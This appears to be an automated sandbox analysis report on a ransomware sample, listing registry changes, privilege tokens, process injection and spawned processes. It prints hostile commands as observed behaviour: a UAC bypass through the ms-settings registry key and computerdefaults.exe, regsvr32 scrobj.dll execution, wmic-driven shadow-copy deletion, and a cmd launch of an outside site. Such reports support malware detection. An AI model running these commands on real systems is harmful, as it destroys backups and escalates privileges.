Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\taskhostw.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\DllHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\sihost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\system32\sihost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\sihost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\sihost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command C:\Windows\system32\taskhostw.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" C:\Windows\system32\taskhostw.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" C:\Windows\System32\RuntimeBroker.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskhostw.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\system32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2924 wrote to memory of 2996 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\notepad.exe
PID 2924 wrote to memory of 2996 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\notepad.exe
PID 2924 wrote to memory of 2860 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\cmd.exe
PID 2924 wrote to memory of 2860 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\cmd.exe
PID 2924 wrote to memory of 4376 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 2924 wrote to memory of 4376 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 2924 wrote to memory of 4852 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\cmd.exe
PID 2924 wrote to memory of 4852 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\cmd.exe
PID 2924 wrote to memory of 368 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\cmd.exe
PID 2924 wrote to memory of 368 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\cmd.exe
PID 368 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 368 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 4852 wrote to memory of 4628 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 4852 wrote to memory of 4628 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 4940 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 4940 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 2860 wrote to memory of 3800 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2860 wrote to memory of 3800 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2024 wrote to memory of 4816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2024 wrote to memory of 4816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2196 wrote to memory of 4048 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\wbem\wmic.exe
PID 2196 wrote to memory of 4048 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\wbem\wmic.exe
PID 2196 wrote to memory of 4936 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2196 wrote to memory of 4936 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2196 wrote to memory of 5060 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2196 wrote to memory of 5060 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 3800 wrote to memory of 4656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 4656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2028 wrote to memory of 1176 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe
PID 2028 wrote to memory of 1176 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe
PID 4816 wrote to memory of 3580 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe
PID 4816 wrote to memory of 3580 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wbem\wmic.exe
PID 4936 wrote to memory of 2772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 4936 wrote to memory of 2772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 5060 wrote to memory of 8 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 5060 wrote to memory of 8 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\WMIC.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3800 wrote to memory of 3892 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\c752934305e1b89f82798ea2c26f70b3_JaffaCakes118.dll,#1

C:\Windows\system32\notepad.exe

notepad.exe C:\Users\Public\readme.txt

C:\Windows\system32\cmd.exe

cmd /c "start http://2cc03a300254d290c0diteiyb.topsaid.site/diteiyb^&2^&55932014^&72^&273^&2219041"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

